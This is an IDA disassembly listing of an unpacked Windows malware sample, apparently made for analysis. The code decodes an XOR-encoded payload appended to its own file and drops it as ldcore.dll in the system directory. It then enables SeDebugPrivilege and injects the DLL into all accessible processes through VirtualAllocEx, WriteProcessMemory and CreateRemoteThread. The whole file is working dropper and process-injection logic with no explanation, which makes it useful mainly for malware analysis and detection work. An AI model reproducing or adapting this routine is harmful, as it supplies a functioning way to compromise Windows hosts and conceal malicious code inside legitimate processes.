;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 0C1CE56581224391A4721530D29F6CEE
; File Name : u:\work\0c1ce56581224391a4721530d29f6cee_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000002F2 ( 754.)
; Section size in file : 000002F2 ( 754.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: start+11F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_402054 ; GetCurrentProcess
push eax
call ds:dword_402008 ; OpenProcessToken
test eax, eax
jz short locret_40106A
lea eax, [ebp+var_C]
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
call ds:dword_402000 ; LookupPrivilegeValueA
test eax, eax
jz short loc_401061
mov eax, [ebp+var_C]
push 0
mov [ebp+var_18], eax
mov eax, [ebp+var_8]
push 0
push 10h
mov [ebp+var_14], eax
lea eax, [ebp+var_1C]
push eax
push 0
push [ebp+var_4]
mov [ebp+var_1C], 1
mov [ebp+var_10], 2
call ds:dword_402004 ; AdjustTokenPrivileges
loc_401061: ; CODE XREF: sub_401000+30�j
push [ebp+var_4]
call ds:dword_40205C ; CloseHandle
locret_40106A: ; CODE XREF: sub_401000+1B�j
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40106C proc near ; CODE XREF: start+12B�p
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_138 = dword ptr -138h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 140h
and [ebp+var_140], 0
push edi
push 49h
pop ecx
xor eax, eax
push eax
lea edi, [ebp+var_13C]
push 2
rep stosd
call sub_4012EC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz loc_401193
push ebx
push esi
mov esi, ds:dword_402020
push offset aCreateremoteth ; "CreateRemoteThread"
mov ebx, offset aKernel32_dll ; "KERNEL32.DLL"
push ebx
call esi ; GetModuleHandleA
mov edi, ds:dword_40201C
push eax
call edi ; GetProcAddress
mov [ebp+var_14], eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_8]
mov [ebp+var_140], 128h
call sub_4012E6 ; Process32First
test eax, eax
jz loc_401188
push offset aWriteprocessme ; "WriteProcessMemory"
push ebx
call esi ; GetModuleHandleA
push eax
call edi ; GetProcAddress
mov [ebp+var_10], eax
loc_4010EE: ; CODE XREF: sub_40106C+116�j
push [ebp+var_138]
xor ebx, ebx
push ebx
push 43Ah
call ds:dword_402014 ; OpenProcess
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_401171
push [ebp+arg_0]
call ds:dword_402010 ; lstrlen
push 4
push 1000h
inc eax
push eax
push ebx
push [ebp+var_4]
mov [ebp+var_C], eax
call ds:dword_402030 ; VirtualAllocEx
cmp eax, ebx
mov [ebp+var_18], eax
jz short loc_401168
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_C]
push [ebp+arg_0]
push eax
push [ebp+var_4]
call [ebp+var_10]
test eax, eax
jz short loc_401168
push ebx
push ebx
push [ebp+var_18]
push offset aLoadlibrarya ; "LoadLibraryA"
push offset aKernel32_dll_0 ; "kernel32.dll"
call esi ; GetModuleHandleA
push eax
call edi ; GetProcAddress
push eax
push ebx
push ebx
push [ebp+var_4]
call [ebp+var_14]
push eax
call ds:dword_40205C ; CloseHandle
loc_401168: ; CODE XREF: sub_40106C+C1�j
; sub_40106C+D6�j
push [ebp+var_4]
call ds:dword_40205C ; CloseHandle
loc_401171: ; CODE XREF: sub_40106C+9B�j
lea eax, [ebp+var_140]
push eax
push [ebp+var_8]
call sub_4012E0 ; Process32Next
test eax, eax
jnz loc_4010EE
loc_401188: ; CODE XREF: sub_40106C+6E�j
push [ebp+var_8]
call ds:dword_40205C ; CloseHandle
pop esi
pop ebx
loc_401193: ; CODE XREF: sub_40106C+2C�j
pop edi
leave
retn
sub_40106C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push 104h
lea eax, [ebp+var_118]
push eax
xor esi, esi
push esi
call ds:dword_40204C ; GetModuleFileNameA
push esi
push esi
push 3
push esi
push 1
push 80000000h
lea eax, [ebp+var_118]
push eax
call ds:dword_402048 ; CreateFileA
mov ebx, eax
or eax, 0FFFFFFFFh
cmp ebx, eax
mov [ebp+var_8], ebx
jz loc_4012DA
push edi
push esi
push ebx
call ds:dword_402044 ; GetFileSize
mov edi, ds:dword_402040
push 2
push esi
push 0FFFFFFF8h
push ebx
mov [ebp+var_4], eax
call edi ; SetFilePointer
push esi
lea eax, [ebp+var_4]
push eax
push 8
lea eax, [ebp+var_10]
push eax
push ebx
mov ebx, ds:dword_40203C
call ebx ; ReadFile
cmp [ebp+var_C], esi
jz loc_4012CE
push [ebp+var_C]
push 40h
call ds:dword_402038 ; GlobalAlloc
cmp eax, esi
mov [ebp+var_14], eax
jz loc_4012CE
push esi
push esi
push [ebp+var_10]
push [ebp+var_8]
call edi ; SetFilePointer
mov edi, [ebp+var_14]
push esi
lea eax, [ebp+var_4]
push eax
push [ebp+var_C]
push edi
push [ebp+var_8]
call ebx ; ReadFile
mov eax, [ebp+var_C]
dec eax
xor ecx, ecx
cmp eax, esi
jbe short loc_40125A
loc_401251: ; CODE XREF: start+C2�j
xor byte ptr [ecx+edi], 0DAh
inc ecx
cmp ecx, eax
jb short loc_401251
loc_40125A: ; CODE XREF: start+B9�j
push 104h
lea eax, [ebp+var_118]
push eax
call ds:dword_402034 ; GetSystemDirectoryA
push offset aLdcore_dll ; "\\ldcore.dll"
lea eax, [ebp+var_118]
push eax
call ds:dword_402058 ; lstrcat
push esi
push esi
push 2
push esi
push 1
push 40000000h
lea eax, [ebp+var_118]
push eax
call ds:dword_402048 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4012C7
push esi
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push edi
push ebx
call ds:dword_40202C ; WriteFile
push ebx
call ds:dword_40205C ; CloseHandle
call sub_401000
lea eax, [ebp+var_118]
push eax
call sub_40106C
pop ecx
loc_4012C7: ; CODE XREF: start+106�j
push edi
call ds:dword_402028 ; GlobalFree
loc_4012CE: ; CODE XREF: start+7A�j start+90�j
push [ebp+var_8]
call ds:dword_40205C ; CloseHandle
xor eax, eax
pop edi
loc_4012DA: ; CODE XREF: start+43�j
pop esi
pop ebx
leave
retn 10h
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012E0 proc near ; CODE XREF: sub_40106C+10F�p
jmp ds:dword_402050
sub_4012E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012E6 proc near ; CODE XREF: sub_40106C+67�p
jmp ds:dword_402018
sub_4012E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012EC proc near ; CODE XREF: sub_40106C+21�p
jmp ds:dword_402024
sub_4012EC endp
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 00000328 ( 808.)
; Section size in file : 00000328 ( 808.)
; Offset to raw data for section: 00002000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 402000h
dword_402000 dd 77DF7311h ; DATA XREF: sub_401000+28�r
dword_402004 dd 77DDA595h ; DATA XREF: sub_401000+5B�r
dword_402008 dd 77DD5D20h ; DATA XREF: sub_401000+13�r
align 10h
dword_402010 dd 77E74672h ; DATA XREF: sub_40106C+A0�r
dword_402014 dd 77E706B7h ; DATA XREF: sub_40106C+90�r
dword_402018 dd 77EBA595h ; DATA XREF: sub_4012E6�r
dword_40201C dd 77E7A5FDh ; DATA XREF: sub_40106C+47�r
dword_402020 dd 77E79F93h ; DATA XREF: sub_40106C+34�r
dword_402024 dd 77EBB1E7h ; DATA XREF: sub_4012EC�r
dword_402028 dd 77E73803h ; DATA XREF: start+132�r
dword_40202C dd 77E79D8Ch ; DATA XREF: start+112�r
dword_402030 dd 77E79824h ; DATA XREF: sub_40106C+B6�r
dword_402034 dd 77E704FCh ; DATA XREF: start+D0�r
dword_402038 dd 77E736A3h ; DATA XREF: start+85�r
dword_40203C dd 77E78B82h ; DATA XREF: start+6F�r
dword_402040 dd 77E78C81h ; DATA XREF: start+52�r
dword_402044 dd 77E793EFh ; DATA XREF: start+4C�r
dword_402048 dd 77E7A837h ; DATA XREF: start+33�r start+FB�r
dword_40204C dd 77E7A099h ; DATA XREF: start+1A�r
dword_402050 dd 77EBA6E9h ; DATA XREF: sub_4012E0�r
dword_402054 dd 77E79C90h ; DATA XREF: sub_401000+C�r
dword_402058 dd 77E74155h ; DATA XREF: start+E2�r
dword_40205C dd 77E77963h ; DATA XREF: sub_401000+64�r
; sub_40106C+F6�r ...
dd 0
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_401000+21�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_40106C+E2�o
align 4
aLoadlibrarya db 'LoadLibraryA',0 ; DATA XREF: sub_40106C+DD�o
align 4
aWriteprocessme db 'WriteProcessMemory',0 ; DATA XREF: sub_40106C+74�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_40106C+3F�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_40106C+3A�o
align 10h
aLdcore_dll db '\ldcore.dll',0 ; DATA XREF: start+D6�o
db '(!',0
align 10h
dd 2 dup(0)
dd 22C8h, 2010h, 2118h, 2 dup(0)
dd 231Ah, 2000h, 5 dup(0)
dd 22EEh, 22D6h, 2306h, 0
dd 21C0h, 21CCh, 21DAh, 21ECh, 21FEh, 2212h, 222Eh, 223Ch
dd 21AEh, 2254h, 226Ah, 2278h, 2284h, 2296h, 22A4h, 22B2h
dd 219Eh, 218Ah, 2248h, 217Ch, 0
dd 6C43002Eh, 4865736Fh, 6C646E61h, 13A0065h
aGetcurrentproc db 'GetCurrentProcess',0
dw 28Ch
aProcess32next db 'Process32Next',0
dw 374h
aVirtualallocex db 'VirtualAllocEx',0
align 10h
dd 736C03BCh, 656C7274h, 416Eh, 704F027Ah, 72506E65h, 7365636Fh
dd 28A0073h, 636F7250h, 33737365h, 72694632h, 7473h, 65470198h
dd 6F725074h, 64644163h, 73736572h, 1770000h, 4D746547h
dd 6C75646Fh, 6E614865h, 41656C64h, 6C0000h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
align 2
dw 1F5h
aGlobalfree db 'GlobalFree',0
align 4
db 94h ; ”
db 3, 57h, 72h
aItefile db 'iteFile',0
db 0ADh ;
db 3, 6Ch, 73h
aTrcata db 'trcatA',0
align 4
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 1EEh
aGlobalalloc db 'GlobalAlloc',0
dd 655202A9h, 69466461h, 656Ch, 6553030Eh, 6C694674h, 696F5065h
dd 7265746Eh, 15B0000h, 46746547h, 53656C69h, 657A69h
dd 7243004Dh, 65746165h, 656C6946h, 1750041h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
aKernel32_dll_1 db 'KERNEL32.dll',0
align 2
dw 1Ch
aAdjusttokenpri db 'AdjustTokenPrivileges',0
dw 14Dh
aLookupprivileg db 'LookupPrivilegeValueA',0
dw 1AAh
aOpenprocesstok db 'OpenProcessToken',0
align 2
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00002400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 403000h
align 2000h
_idata2 ends
end start